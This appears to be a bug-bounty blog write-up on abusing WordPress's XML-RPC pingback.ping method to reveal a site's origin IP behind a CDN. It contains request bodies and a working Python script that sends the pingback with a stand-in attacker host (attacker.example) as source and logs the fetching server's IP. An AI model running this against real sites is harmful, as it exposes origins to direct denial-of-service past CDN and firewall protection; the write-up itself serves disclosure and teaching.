How I was able to abuse XML-RPC to get the Origin IP

Opara David

What is XML-RPC

XML-RPC stands for "XML Remote Procedure Call". It’s a protocol that allows software running on different operating systems or written in different programming languages to make procedure calls over a network (usually HTTP).

How it works:

  • Remote Procedure Call (RPC): One program sends a request to another program to execute a function/procedure.

  • XML: The request and response are encoded in XML format.

  • Transport: The communication happens over HTTP.

A typical XML-RPC request might look like this:

<?xml version="1.0"?>
<methodCall>
  <methodName>math.add</methodName>
  <params>
    <param><value><int>5</int></value></param>
    <param><value><int>3</int></value></param>
  </params>
</methodCall>

How I found this vulnerability

I was basically performing recon on my target. I visited the Wayback Machine to fetch more URLs that might contain useful information to ignite a spark. In the course of that, I stumbled upon this URL:

http://redacted.com:80/xmlrpc.php?rsd

Immediately, I remembered the XML-RPC write-up I had read on the internet some days back, and how to exploit it to obtain the origin IP, which attackers can use to DDoS the application directly, bypassing whatever CDN or WAF sits in front of it.

When I visited the URL, it gave a message saying "XML-RPC server accepts POST requests only". I captured the request in Burp Suite, changed the request method to POST, and added the XML below to the request body to list all the available methods.

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

The response listed every method the server exposes, giving you a list of functions that can potentially be abused. Among them was a method called pingback.ping, which lets you test whether the site processes pingbacks.

So the exploit is simple: pass the URL of a server you control as the first parameter (the pingback source) and a valid post on the vulnerable site as the second (the pingback target), then log the incoming request on your server. The server fetches the source URL to verify that it links to the target post, and that fetch comes from the origin server itself, not from the CDN in front of it, so the client IP in your log is the origin IP. To make the whole process easier, you can use Burp Collaborator as the server.

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>https://<YOUR SERVER></string></value>
</param>
<param>
<value><string>https://<SOME VALID BLOG FROM THE SITE>/</string></value>
</param>
</params>
</methodCall>
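The two requests above, scripted end to end as an added example; this is not the author's code or Burp output. It uses only the Python standard library. TARGET, SOURCE and POST_URL are placeholders you must replace, and the sample responses in the block are constructed to show the shapes a WordPress xmlrpc.php returns, not captured from the target.

```python
"""Added example (not the author's code): the system.listMethods and
pingback.ping calls from the write-up, plus a listener that records the
IP the target's pingback verification fetch comes from.

TARGET, SOURCE and POST_URL are placeholders: the real xmlrpc.php
endpoint, a server you control, and a real post on the site.
"""
import http.server
import threading
import urllib.request
import xmlrpc.client

TARGET = "http://redacted.com/xmlrpc.php"           # placeholder, from the write-up
SOURCE = "http://attacker.example:8080/probe"       # placeholder: listener you control
POST_URL = "https://redacted.com/some-valid-post/"  # placeholder: real post on the target

# Constructed sample responses (shape only, not captured from any target).
SAMPLE_LISTING = (
    '<?xml version="1.0"?><methodResponse><params><param><value><array><data>'
    '<value><string>system.listMethods</string></value>'
    '<value><string>pingback.ping</string></value>'
    '</data></array></value></param></params></methodResponse>'
)
SAMPLE_FAULT = (
    '<?xml version="1.0"?><methodResponse><fault><value><struct>'
    '<member><name>faultCode</name><value><int>17</int></value></member>'
    '<member><name>faultString</name><value><string>no link</string></value></member>'
    '</struct></value></fault></methodResponse>'
)


def build_call(method, *params):
    """Serialise an XML-RPC methodCall body, equivalent to the hand-written XML."""
    return xmlrpc.client.dumps(params, methodname=method)


def send_call(endpoint, body, timeout=10):
    """POST the body (xmlrpc.php rejects GET) and return the raw XML response."""
    req = urllib.request.Request(
        endpoint, data=body.encode(), method="POST",
        headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def exposed_methods(list_methods_response):
    """Parse a system.listMethods response into the list of method names."""
    (methods,), _ = xmlrpc.client.loads(list_methods_response)
    return list(methods)


def pingback_result(raw_response):
    """Return (ok, detail). A fault about the source page (no link back) still
    means SOURCE was fetched; a fault about the target means fix POST_URL."""
    try:
        (value,), _ = xmlrpc.client.loads(raw_response)
        return True, str(value)
    except xmlrpc.client.Fault as fault:
        return False, f"fault {fault.faultCode}: {fault.faultString}"


HITS = []  # (client_ip, user_agent) for every request the listener receives


def record_hit(client_ip, user_agent):
    """The client IP of the verification fetch is the candidate origin IP."""
    HITS.append((client_ip, user_agent))
    return HITS[-1]


class ProbeHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        record_hit(self.client_address[0], self.headers.get("User-Agent", ""))
        body = f'<a href="{POST_URL}">target</a>'.encode()  # link back keeps the pingback valid
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep stdout quiet; HITS is the log
        pass


def start_listener(port):
    server = http.server.HTTPServer(("0.0.0.0", port), ProbeHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    methods = exposed_methods(send_call(TARGET, build_call("system.listMethods")))
    if "pingback.ping" not in methods:
        raise SystemExit("pingback.ping is not exposed")
    listener = start_listener(8080)  # must match the port in SOURCE
    ok, detail = pingback_result(
        send_call(TARGET, build_call("pingback.ping", SOURCE, POST_URL)))
    print("pingback response:", ok, detail)
    for ip, ua in HITS:
        print("fetched by", ip, "with User-Agent", ua)
    listener.shutdown()
```

Burp Collaborator can replace the listener: put the Collaborator hostname in SOURCE and read the client IP from the HTTP interaction. Two caveats when reading the result: the hit is only logged if the target resolved POST_URL to a real, pingback-enabled post, so a fault with no hit usually means the second parameter is wrong, not that the technique failed; and the IP you capture is the server's egress address, which is the origin in the common case but can be a NAT gateway or outbound proxy, so confirm it by requesting the site directly from that IP with the right Host header before reporting.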

Disclosure of a web server's origin IP is a bug and should be reported: attackers can send DoS traffic straight to the origin, bypassing the CDN's protection. Read our other blogs on origin IP disclosure.
